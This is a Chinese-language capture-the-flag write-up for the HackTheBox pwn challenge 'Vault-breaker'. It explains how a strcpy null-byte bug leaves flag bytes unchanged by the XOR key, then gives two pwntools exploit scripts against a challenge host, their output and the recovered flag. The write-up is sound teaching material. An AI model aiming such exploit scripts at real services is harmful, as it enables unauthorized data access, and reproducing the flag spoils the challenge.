HackTheBox-Challenges Vault-breaker Writeup

Exploitation

這題保護全開，然後程式主邏輯如下：

unsigned __int64 new_key_gen()
{
  int random_fd; // eax
  int random_fd2; // eax
  unsigned __int64 i; // [rsp+8h] [rbp-58h]
  unsigned __int64 input_num; // [rsp+10h] [rbp-50h]
  FILE *random_fp; // [rsp+18h] [rbp-48h]
  char key_buf[40]; // [rsp+20h] [rbp-40h] BYREF
  unsigned __int64 v7; // [rsp+48h] [rbp-18h]

  v7 = __readfsqword(0x28u);
  i = 0LL;
  input_num = 34LL;
  random_fp = fopen("/dev/urandom", "rb");
  if ( !random_fp )
  {
    fprintf(stdout, "\n%sError opening /dev/urandom, exiting..\n", "\x1B[1;31m");
    exit(21);
  }
  while ( input_num > 0x1F )
  {
    printf("\n[*] Length of new password (0-%d): ", 31LL);
    input_num = read_num();
  }
  memset(key_buf, 0, 0x20uLL);
  random_fd = fileno(random_fp);
  read(random_fd, key_buf, input_num);
  while ( i < input_num )
  {
    while ( !key_buf[i] )
    {
      random_fd2 = fileno(random_fp);
      read(random_fd2, &key_buf[i], 1uLL);
    }
    ++i;
  }
  strcpy(random_key, key_buf);
  fclose(random_fp);
  printf("\n%s[+] New key has been genereated successfully!\n%s", "\x1B[1;32m", "\x1B[1;34m");
  return __readfsqword(0x28u) ^ v7;
}

這邊的問題就是他會讓我們生成隨機長度的密鑰，但是他用 strcpy 而不是 memcpy，這導致他會把 null byte 也複製過去，所以我們就可以透過不同長度的密鑰來控制 null byte 的位置，而他做的就只是把 random key 跟 flag 做 xor 而剛好 xor 0 不會變。

Exploit

這邊提供兩種解法：

1. 第一種是假設我們密鑰等於 0 所以 random key 第一位就會等於 null byte，這時我們就可以看到 flag 的第一位，以此類推，我們從 0 到 31 就可以得到整個 flag：

   import warnings
   
   from pwn import *
   
   warnings.filterwarnings("ignore", category=BytesWarning)
   
   flag = b"HTB{"
   
   while flag[-1] != b"}":
       r = remote("94.237.52.225", 39459)
       r.sendlineafter(b"> ", "1")
       r.sendlineafter(b": ", str(len(flag)))
       r.sendlineafter(b"> ", "2")
       r.recvuntil(b"Vault: ")
       r.recv(len(flag))
       flag += r.recv(1)
       r.close()
       print(flag)

   執行結果：

   └─$ python vault.py
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4n'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_k'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_ku'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kud'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudu'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0r'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0r0'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0r0r'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0r0r0'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0r0r0}'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0r0r0}\n'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0r0r0}\n\n'
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   [*] Closed connection to 94.237.52.225 port 39459
   b'HTB{d4nz4_kudur0r0r0}\n\n\n'

   因為他 flag 有加換行所以沒有正常終止，可以改成 endswith 之類的。
2. 第二種是我們從 31 設定回來，這樣 random key 就都會是 null byte：

   import warnings
   
   from pwn import *
   
   warnings.filterwarnings("ignore", category=BytesWarning)
   
   r = remote("94.237.52.225", 39459)
   
   for i in range(31, -1, -1):
       print(f"{i=}")
       r.sendlineafter(b"> ", "1")
       r.sendlineafter(b": ", str(i))
   
   r.sendlineafter(b"> ", "2")
   r.recvuntil(b"Vault: ")
   r.interactive()

   執行結果：

   └─$ python vault2.py
   [+] Opening connection to 94.237.52.225 on port 39459: Done
   i=31
   i=30
   i=29
   i=28
   i=27
   i=26
   i=25
   i=24
   i=23
   i=22
   i=21
   i=20
   i=19
   i=18
   i=17
   i=16
   i=15
   i=14
   i=13
   i=12
   i=11
   i=10
   i=9
   i=8
   i=7
   i=6
   i=5
   i=4
   i=3
   i=2
   i=1
   i=0
   [*] Switching to interactive mode
   HTB{d4nz4_kudur0r0r0}

Pwned